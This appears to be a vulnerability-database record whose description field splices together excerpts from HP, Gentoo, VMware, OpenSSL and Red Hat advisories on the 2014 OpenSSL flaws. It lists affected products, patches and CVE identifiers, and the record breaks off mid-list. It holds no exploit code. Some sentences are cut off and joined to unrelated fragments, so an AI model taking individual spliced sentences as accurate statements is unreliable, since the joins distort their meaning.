here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04355095\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04355095\nVersion: 1\n\nHPSBMU03062 rev.1 - HP Insight Control server deployment on Linux and Windows\nrunning OpenSSL, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2014-08-08\nLast Updated: 2014-08-08\n\nPotential Security Impact: Remote denial of service (DoS), code execution,\nunauthorized access, disclosure of information\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP System\nManagement Homepage (SMH), HP Smart Update Manager (SUM), and HP Version\nControl Agent (VCA) running on Linux and Windows. These components of HP\nInsight Control server deployment could be exploited remotely resulting in\ndenial of service (DoS), code execution, unauthorized access, or disclosure\nof information. \n\nHP Insight Control server deployment packages HP System Management Homepage\n(SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM)\nand deploys them through the following components. This bulletin provides the\ninformation needed to update the HP Insight Control server deployment\nsolution. \n\nInstall HP Management Agents for Windows x86/x64\nInstall HP Management Agents for RHEL 5 x64\nInstall HP Management Agents for RHEL 6 x64\nInstall HP Management Agents for SLES 10 x64\nInstall HP Management Agents for SLES 11 x64\nUpgrade Proliant Firmware\n\nReferences:\n\nCVE-2010-5298 Remote Denial of Service\nCVE-2014-0076 Unauthorized Disclosure of Information\nCVE-2014-0195 Remote Unauthorized Access\nCVE-2014-0198 Remote Denial of Service\nCVE-2014-0221 Remote Denial of Service (DoS)\nCVE-2014-0224 Remote Unauthorized Access or Disclosure of Information\nCVE-2014-3470 Remote Code Execution or Unauthorized Access\nSSRT101628\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0\nCVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following updates to v7.3.1 of HP Insight Control server\ndeployment to resolve this vulnerability. HP has provided manual update steps\nif a version upgrade is not possible; if users wish to remain at v7.1.2,\nv7.2.0, or v7.2.1. \n\nNote: It is important to check your current running version of HP Insight\nControl server deployment and to follow the correct steps listed below. For\nHP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and\nfollow the steps below to remove the vulnerability. The vulnerability known\nas Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server\ndeployment v7.3.1. That Security Bulletin with instructions on how to upgrade\nto v7.3.1 can be found here:\n\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\na-c04267749\n\nHP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should\ntake the following steps to remove this vulnerability. \n\nDelete the files smhamd64-*.exe/smhx86-*.exe\" from Component Copy Location\nlisted in the following table, rows 1 and 2. \nDelete the files \"vcax86-*.exe/vcaamd64-*.exe from Component Copy Location\nlisted in the following table, rows 3 and 4. \nDelete the files hpsmh-7.*.rpm\" from Component Copy Location listed in row 5. \nIn sequence, perform the steps from left to right in the following table. \nFirst, download components from Download Link; Second, rename the component\nas suggested in Rename to. Third, copy the component to the location\nspecified in Component Copy Location. \nTable Row Number\n Download Link\n Rename to\n Component Copy Location\n\n1\n http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba\n smhamd64-ccp023716.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n2\n http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05\n smhx86-cp023715.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n3\n http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13\n vcax86-cp023742.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n4\n http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2\n vcaamd64-cp023743.exe\n \\\\express\\hpfeatures\\hpagents-ws\\components\\Win2008\n\n5\n http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93\n Do not rename the downloaded component for this step. \n \\\\express\\hpfeatures\\hpagents-sles11-x64\\components\n\\\\express\\hpfeatures\\hpagents-sles10-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel5-x64\\components\n\\\\express\\hpfeatures\\hpagents-rhel6-x64\\components\n\nDownload and extract the HPSUM 5.3.6 component from\nftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793\n\nCopy all content from extracted ZIP folder and paste into\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components\nInitiate Install HP Management Agents for SLES 11 x64 on targets running\nSLES11 x64. \nInitiate Install HP Management Agents for SLES 10 x64 on targets running\nSLES10 x64. \nInitiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL\n6 x64. \nInitiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL\n5 x64. \nInitiate Install HP Management Agents for Windows x86/x64 on targets running\nWindows. \n\nHP Insight Control server deployment users with v7.2.2:\n\nPlease upgrade to Insight Control server deployment v7.3.1 and follow the\nsteps below for v7.3.1. \n\nHP Insight Control server deployment users with v7.3.1:\n\nPerform steps 1 - 4 as outlined above for users with HP Insight Control\nserver deployment v7.1.2, v7.2.0, and v7.2.1. \nDownload the HP SUM ZIP file from\nhttp://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f\n\nExtract the contents from the HP SUM ZIP file to\n\\\\eXpress\\hpfeatures\\fw-proLiant\\components location on the Insight Control\nserver deployment server\n\nRelated security bulletins:\n\nFor System Management Homepage please see Security bulletin HPSBMU03051 https\n://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04\n345210\n\nFor HP Version Control Agent please see Security bulletin HPSBMU03057 https:/\n/h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434\n9897\n\nHISTORY\nVersion:1 (rev.1) - 8 August 2014 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2014 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.13 (GNU/Linux)\n\niEYEARECAAYFAlPk9ewACgkQ4B86/C0qfVn1/gCfR2U/mZZXYwPms9ptZcBTua/5\nMoQAn1qlQ3kmLRs7YFN5GzwBTRfSK5Go\n=r0qe\n-----END PGP SIGNATURE-----\n. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll OpenSSL users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=dev-libs/openssl-1.0.1h-r1\"\n\nReferences\n==========\n\n[ 1 ] CVE-2010-5298\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298\n[ 2 ] CVE-2014-0195\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195\n[ 3 ] CVE-2014-0198\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198\n[ 4 ] CVE-2014-0221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221\n[ 5 ] CVE-2014-0224\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224\n[ 6 ] CVE-2014-3470\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470\n[ 7 ] OpenSSL Security Advisory [05 Jun 2014]\n http://www.openssl.org/news/secadv_20140605.txt\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201407-05.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. Summary\n\n VMware product updates address OpenSSL security vulnerabilities. \n\n2. Problem Description\n\n a. \n\n OpenSSL libraries have been updated in multiple products to\n versions 0.9.8za and 1.0.1h in order to resolve multiple security\n issues. \n \n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n\n has assigned the names CVE-2014-0224, CVE-2014-0198, \n CVE-2010-5298, CVE-2014-3470, CVE-2014-0221 and CVE-2014-0195 to\n these issues. The most important of these issues is \n CVE-2014-0224. \n\n CVE-2014-0198, CVE-2010-5298 and CVE-2014-3470 are considered to\n be of moderate severity. Exploitation is highly unlikely or is\n mitigated due to the application configuration. \n\n CVE-2014-0221 and CVE-2014-0195, which are listed in the OpenSSL \n Security Advisory (see Reference section below), do not affect\n any VMware products. For readability\n the affected products have been split into 3 tables below, \n based on the different client-server configurations and\n deployment scenarios. Applying these patches to \n affected servers will mitigate the affected clients (See Table 1\n below). \n\n Clients that communicate over untrusted networks such as public\n Wi-Fi and communicate to a server running a vulnerable version of \n OpenSSL 1.0.1. can be mitigated by using a secure network such as \n VPN (see Table 2 below). \n \n Clients and servers that are deployed on an isolated network are\n less exposed to CVE-2014-0224 (see Table 3 below). The affected\n products are typically deployed to communicate over the\n management network. \n\n RECOMMENDATIONS\n\n VMware recommends customers evaluate and deploy patches for\n affected Servers in Table 1 below as these patches become\n available. Patching these servers will remove the ability to\n exploit the vulnerability described in CVE-2014-0224 on both\n clients and servers. VMware recommends customers consider \n applying patches to products listed in Table 2 \u0026 3 as required. \n\n Column 4 of the following tables lists the action required to\n remediate the vulnerability in each release, if a solution is\n available. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n ESXi 5.5 ESXi ESXi550-\n 201406401-SG \n\n Big Data Extensions 1.1 patch pending \n Charge Back Manager 2.6 patch pending \n\n Horizon Workspace Server \n GATEWAY 1.8.1 patch pending \n Horizon Workspace Server \n GATEWAY 1.5 patch pending \n\n Horizon Workspace Server \n DATA 1.8.1 patch pending \n\n Horizon Mirage Edge Gateway 4.4.2 patch pending \n Horizon View 5.3.1 patch pending \n\n Horizon View Feature Pack 5.3 SP2 patch pending \n\n NSX for Multi-Hypervisor 4.1.2 patch pending \n NSX for Multi-Hypervisor 4.0.3 patch pending \n NSX for vSphere 6.0.4 patch pending \n NVP 3.2.2 patch pending \n vCAC 6.0.1 patch pending \n\n vCloud Networking and Security 5.5.2 \t\t patch pending \n vCloud Networking and Security 5.1.2 \t\t patch pending \n\n vFabric Web Server 5.3.4 patch pending \n\n vCHS - DPS-Data Protection 2.0 patch pending \n Service\n\n Table 2\n ========\n Affected clients running a vulnerable version of OpenSSL 0.9.8 \n or 1.0.1 and communicating over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCSA 5.5 patch pending \n vCSA 5.1 patch pending \n vCSA 5.0 patch pending \n\n\n ESXi 5.1 ESXi patch pending \n ESXi 5.0 ESXi patch pending \n\n Workstation 10.0.2 any patch pending \n Workstation 9.0.3 any patch pending \n Fusion 6.x OSX patch pending \n Fusion 5.x OSX patch pending \n Player 10.0.2 any patch pending \n Player 9.0.3 any patch pending \n\n Chargeback Manager 2.5.x patch pending \n\n Horizon Workspace Client for 1.8.1 OSX patch pending \n Mac\n Horizon Workspace Client for 1.5 OSX patch pending \n Mac\n Horizon Workspace Client for 1.8.1 Windows patch pending \n Windows \n Horizon Workspace Client for 1.5 Windows patch pending \n\n OVF Tool 3.5.1 patch pending \n OVF Tool 3.0.1 patch pending \n\n vCenter Operations Manager 5.8.1 patch pending \n\n vCenter Support Assistant 5.5.0 patch pending \n vCenter Support Assistant 5.5.1 patch pending \n \n vCD 5.1.2 patch pending \n vCD 5.1.3 patch pending \n vCD 5.5.1.1 patch pending \n vCenter Site Recovery Manager 5.0.3.1 patch pending \n\n Table 3\n =======\n The following table lists all affected clients running a\n vulnerable version of OpenSSL 0.9.8 or 1.0.1 and communicating\n over an untrusted network. \n\n VMware Product Running Replace with/\n Product Version on Apply Patch \n ============== ======= ======= =============\n vCenter Server 5.5 any patch pending\n vCenter Server 5.1 any patch pending\n vCenter Server 5.0 any patch pending\n\n Update Manager 5.5 Windows patch pending\n Update Manager 5.1 Windows patch pending\n Update Manager 5.0 Windows patch pending \n\n Config Manager (VCM) 5.6 patch pending \n\n Horizon View Client 5.3.1 patch pending \n Horizon View Client 4.x patch pending\n Horizon Workspace 1.8.1 patch pending \n Horizon Workspace 1.5 patch pending \n \n \n ITBM Standard 1.0.1 patch pending \n ITBM Standard 1.0 patch pending \n \n Studio 2.6.0.0 patch pending \n \n Usage Meter 3.3 patch pending \n vCenter Chargeback Manager 2.6 patch pending \n vCenter Converter Standalone 5.5 patch pending \n vCenter Converter Standalone 5.1 patch pending \n vCD (VCHS) 5.6.2 patch pending \n \n vCenter Site Recovery Manager 5.5.1 patch pending \n vCenter Site Recovery Manager 5.1.1 patch pending\n\n vFabric Application Director 5.2.0 patch pending \n vFabric Application Director 5.0.0 patch pending \n View Client 5.3.1 patch pending \n View Client 4.x patch pending\n VIX API 5.5 patch pending \n VIX API 1.12 patch pending \n \n vMA (Management Assistant) 5.1.0.1 patch pending \n \n\n VMware Data Recovery 2.0.3 patch pending \n \n VMware vSphere CLI 5.5 patch pending \n \n vSphere Replication 5.5.1 patch pending \n vSphere Replication 5.6 patch pending \n vSphere SDK for Perl 5.5 patch pending \n vSphere Storage Appliance 5.5.1 patch pending \n vSphere Storage Appliance 5.1.3 patch pending \n vSphere Support Assistant 5.5.1 patch pending \n vSphere Support Assistant 5.5.0 patch pending\n vSphere Virtual Disk 5.5 patch pending \n Development Kit \n vSphere Virtual Disk 5.1 patch pending \n Development Kit\n vSphere Virtual Disk 5.0 patch pending \n Development Kit\n \n 4. Solution\n\n ESXi 5.5\n ----------------------------\n\n Download:\n https://www.vmware.com/patchmgr/download.portal\n\n Release Notes and Remediation Instructions:\n http://kb.vmware.com/kb/2077359\n\n 5. References\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470\n \n https://www.openssl.org/news/secadv_20140605.txt\n\n- -----------------------------------------------------------------------\n\n6. Change Log\n\n 2014-06-10 VMSA-2014-0006\n Initial security advisory in conjunction with the release of\n ESXi 5.5 updates on 2014-06-10\n\n- -----------------------------------------------------------------------\n \n7. Contact\n\n E-mail list for product security notifications and announcements:\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\n This Security Advisory is posted to the following lists:\n\n security-announce at lists.vmware.com\n bugtraq at securityfocus.com\n fulldisclosure at seclists.org\n\n E-mail: security at vmware.com\n PGP key at: http://kb.vmware.com/kb/1055\n\n VMware Security Advisories\n http://www.vmware.com/security/advisories\n\n VMware Security Response Policy\n https://www.vmware.com/support/policies/security_response.html\n\n VMware Lifecycle Support Phases\n https://www.vmware.com/support/policies/lifecycle.html\n \n Twitter\n https://twitter.com/VMwareSRC\n\n Copyright 2014 VMware Inc. All rights reserved. The\nupdates are available from the following location using ftp:\n\nftp://srt03046:Secure12@ftp.usa.hp.com\n\nUser name: srt03046\nPassword: Secure12 ( NOTE: Case sensitive)\n\nHP-UX Release\n HP-UX OpenSSL version\n\nB.11.11 (11i v1)\n A.00.09.08za.001_HP-UX_B.11.11_32+64.depot\n\nB.11.23 (11i v2)\n A.00.09.08za.002_HP-UX_B.11.23_IA-PA.depot\n\nB.11.31 (11i v3)\n A.00.09.08za.003_HP-UX_B.11.31_IA-PA.depot\n\nMANUAL ACTIONS: Yes - Update\n\nInstall OpenSSL A.00.09.08za or subsequent\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. OpenSSL Security Advisory [05 Jun 2014]\n========================================\n\nSSL/TLS MITM vulnerability (CVE-2014-0224)\n===========================================\n\nAn attacker using a carefully crafted handshake can force the use of weak\nkeying material in OpenSSL SSL/TLS clients and servers. This can be exploited\nby a Man-in-the-middle (MITM) attack where the attacker can decrypt and \nmodify traffic from the attacked client and server. \n\nThe attack can only be performed between a vulnerable client *and*\nserver. Users\nof OpenSSL servers earlier than 1.0.1 are advised to upgrade as a precaution. \n\nOpenSSL 0.9.8 SSL/TLS users (client and/or server) should upgrade to 0.9.8za. \nOpenSSL 1.0.0 SSL/TLS users (client and/or server) should upgrade to 1.0.0m. \nOpenSSL 1.0.1 SSL/TLS users (client and/or server) should upgrade to 1.0.1h. \n\nThanks to KIKUCHI Masashi (Lepidum Co. Ltd.) for discovering and\nresearching this issue. This issue was reported to OpenSSL on 1st May\n2014 via JPCERT/CC. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team partly based\non an original patch from KIKUCHI Masashi. \n\nDTLS recursion flaw (CVE-2014-0221)\n====================================\n\nBy sending an invalid DTLS handshake to an OpenSSL DTLS client the code\ncan be made to recurse eventually crashing in a DoS attack. \n\nOnly applications using OpenSSL as a DTLS client are affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to Imre Rad (Search-Lab Ltd.) for discovering this issue. This\nissue was reported to OpenSSL on 9th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nDTLS invalid fragment vulnerability (CVE-2014-0195)\n====================================================\n\nA buffer overrun attack can be triggered by sending invalid DTLS fragments\nto an OpenSSL DTLS client or server. \n\nOnly applications using OpenSSL as a DTLS client or server affected. \n\nOpenSSL 0.9.8 DTLS users should upgrade to 0.9.8za\nOpenSSL 1.0.0 DTLS users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1h. \n\nThanks to J\u00fcri Aedla for reporting this issue. This issue was\nreported to OpenSSL on 23rd April 2014 via HP ZDI. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nSSL_MODE_RELEASE_BUFFERS NULL pointer dereference (CVE-2014-0198)\n=================================================================\n\nA flaw in the do_ssl3_write function can allow remote attackers to\ncause a denial of service via a NULL pointer dereference. This flaw\nonly affects OpenSSL 1.0.0 and 1.0.1 where SSL_MODE_RELEASE_BUFFERS is\nenabled, which is not the default and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. The fix was developed by\nMatt Caswell of the OpenSSL development team. \n\nSSL_MODE_RELEASE_BUFFERS session injection or denial of service (CVE-2010-5298)\n===============================================================================\n \nA race condition in the ssl3_read_bytes function can allow remote\nattackers to inject data across sessions or cause a denial of service. \nThis flaw only affects multithreaded applications using OpenSSL 1.0.0\nand 1.0.1, where SSL_MODE_RELEASE_BUFFERS is enabled, which is not the\ndefault and not common. \n\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThis issue was reported in public. \n\nAnonymous ECDH denial of service (CVE-2014-3470)\n================================================\n\nOpenSSL TLS clients enabling anonymous ECDH ciphersuites are subject to a\ndenial of service attack. \n\nOpenSSL 0.9.8 users should upgrade to 0.9.8za\nOpenSSL 1.0.0 users should upgrade to 1.0.0m. \nOpenSSL 1.0.1 users should upgrade to 1.0.1h. \n\nThanks to Felix Gr\u00f6bert and Ivan Fratri\u0107 at Google for discovering this\nissue. This issue was reported to OpenSSL on 28th May 2014. \n\nThe fix was developed by Stephen Henson of the OpenSSL core team. \n\nOther issues\n============\n\nOpenSSL 1.0.0m and OpenSSL 0.9.8za also contain a fix for\nCVE-2014-0076: Fix for the attack described in the paper \"Recovering\nOpenSSL ECDSA Nonces Using the FLUSH+RELOAD Cache Side-channel Attack\"\nReported by Yuval Yarom and Naomi Benger. This issue was previously\nfixed in OpenSSL 1.0.1g. \n\n\nReferences\n==========\n\nURL for this Security Advisory:\nhttp://www.openssl.org/news/secadv_20140605.txt\n\nNote: the online version of the advisory may be updated with additional\ndetails over time. \n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section. Relevant releases/architectures:\n\nRed Hat Storage Server 2.1 - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. (CVE-2014-0195)\n\nMultiple flaws were found in the way OpenSSL handled read and write buffers\nwhen the SSL_MODE_RELEASE_BUFFERS mode was enabled. A specially crafted DTLS handshake packet could cause\na DTLS client using OpenSSL to crash. A specially\ncrafted handshake packet could cause a TLS/SSL client that has the\nanonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)\n\nRed Hat would like to thank the OpenSSL project for reporting these issues. \nUpstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter\nof CVE-2014-0224, J\u00fcri Aedla as the original reporter of CVE-2014-0195,\nImre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix\nGr\u00f6bert and Ivan Fratri\u0107 of Google as the original reporters of\nCVE-2014-3470. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to\nuse the Red Hat Network to apply this update are available at\nhttps://access.redhat.com/site/articles/11258\n\n5. Package List:\n\nRed Hat Storage Server 2.1:\n\nSource:\nopenssl-1.0.1e-16.el6_5.14.src.rpm\n\nx86_64:\nopenssl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm\nopenssl-static-1.0.1e-16.el6_5.14.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc", "sources": [ { "db": "NVD", "id": "CVE-2014-0195" }, { "db": "JVNDB", "id": "JVNDB-2014-002765" }, { "db": "ZDI", "id": "ZDI-14-173" }, { "db": "BID", "id": "67900" }, { "db": "VULMON", "id": "CVE-2014-0195" }, { "db": "PACKETSTORM", "id": "127917" }, { "db": "PACKETSTORM", "id": "127018" }, { "db": "PACKETSTORM", "id": "127807" }, { "db": "PACKETSTORM", "id": "127630" }, { "db": "PACKETSTORM", "id": "127045" }, { "db": "PACKETSTORM", "id": "127086" }, { "db": "PACKETSTORM", "id": "126961" }, { "db": "PACKETSTORM", "id": "126930" } ], "trust": 3.33 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2014-0195", "trust": 3.7 }, { "db": "ZDI", "id": "ZDI-14-173", "trust": 2.1 }, { "db": "BID", "id": "67900", "trust": 1.4 }, { "db": "MCAFEE", "id": "SB10075", "trust": 1.4 }, { "db": "SECUNIA", "id": "59659", "trust": 1.1 }, { "db": "SECUNIA", "id": "58977", "trust": 1.1 }, { "db": "SECUNIA", "id": "59310", "trust": 1.1 }, { "db": "SECUNIA", "id": "59305", "trust": 1.1 }, { "db": "SECUNIA", "id": "59189", "trust": 1.1 }, { "db": "SECUNIA", "id": "59721", "trust": 1.1 }, { "db": "SECUNIA", "id": "59587", "trust": 1.1 }, { "db": "SECUNIA", "id": "58337", "trust": 1.1 }, { "db": "SECUNIA", "id": "59491", "trust": 1.1 }, { "db": "SECUNIA", "id": "59300", "trust": 1.1 }, { "db": "SECUNIA", "id": "60571", "trust": 1.1 }, { "db": "SECUNIA", "id": "59287", "trust": 1.1 }, { "db": "SECUNIA", "id": "58939", "trust": 1.1 }, { "db": "SECUNIA", "id": "59162", "trust": 1.1 }, { "db": "SECUNIA", "id": "58743", "trust": 1.1 }, { "db": "SECUNIA", "id": "59449", "trust": 1.1 }, { "db": "SECUNIA", "id": "59364", "trust": 1.1 }, { "db": "SECUNIA", "id": "59990", "trust": 1.1 }, { "db": "SECUNIA", "id": "59192", "trust": 1.1 }, { "db": "SECUNIA", "id": "58945", "trust": 1.1 }, { "db": "SECUNIA", "id": "59126", "trust": 1.1 }, { "db": "SECUNIA", "id": "61254", "trust": 1.1 }, { "db": "SECUNIA", "id": "59175", "trust": 1.1 }, { "db": "SECUNIA", "id": "59655", "trust": 1.1 }, { "db": "SECUNIA", "id": "59451", "trust": 1.1 }, { "db": "SECUNIA", "id": "59429", "trust": 1.1 }, { "db": "SECUNIA", "id": "59040", "trust": 1.1 }, { "db": "SECUNIA", "id": "59306", "trust": 1.1 }, { "db": "SECUNIA", "id": "59518", "trust": 1.1 }, { "db": "SECUNIA", "id": "58660", "trust": 1.1 }, { "db": "SECUNIA", "id": "59530", "trust": 1.1 }, { "db": "SECUNIA", "id": "59490", "trust": 1.1 }, { "db": "SECUNIA", "id": "59666", "trust": 1.1 }, { "db": "SECUNIA", "id": "59514", "trust": 1.1 }, { "db": "SECUNIA", "id": "59784", "trust": 1.1 }, { "db": "SECUNIA", "id": "58615", "trust": 1.1 }, { "db": "SECUNIA", "id": "59188", "trust": 1.1 }, { "db": "SECUNIA", "id": "59413", "trust": 1.1 }, { "db": "SECUNIA", "id": "58713", "trust": 1.1 }, { "db": "SECUNIA", "id": "58883", "trust": 1.1 }, { "db": "SECUNIA", "id": "58714", "trust": 1.1 }, { "db": "SECUNIA", "id": "59365", "trust": 1.1 }, { "db": "SECUNIA", "id": "59441", "trust": 1.1 }, { "db": "SECUNIA", "id": "59223", "trust": 1.1 }, { "db": "SECUNIA", "id": "59454", "trust": 1.1 }, { "db": "SECUNIA", "id": "59450", "trust": 1.1 }, { "db": "SECUNIA", "id": "59301", "trust": 1.1 }, { "db": "SECUNIA", "id": "59895", "trust": 1.1 }, { "db": "SECUNIA", "id": "59342", "trust": 1.1 }, { "db": "SECUNIA", "id": "59669", "trust": 1.1 }, { "db": "SECUNIA", "id": "59437", "trust": 1.1 }, { "db": "SECUNIA", "id": "59528", "trust": 1.1 }, { "db": "SECTRACK", "id": "1030337", "trust": 1.1 }, { "db": "JUNIPER", "id": "JSA10629", "trust": 1.1 }, { "db": "JVN", "id": "JVNVU93868849", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-002765", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2304", "trust": 0.7 }, { "db": "ICS CERT", "id": 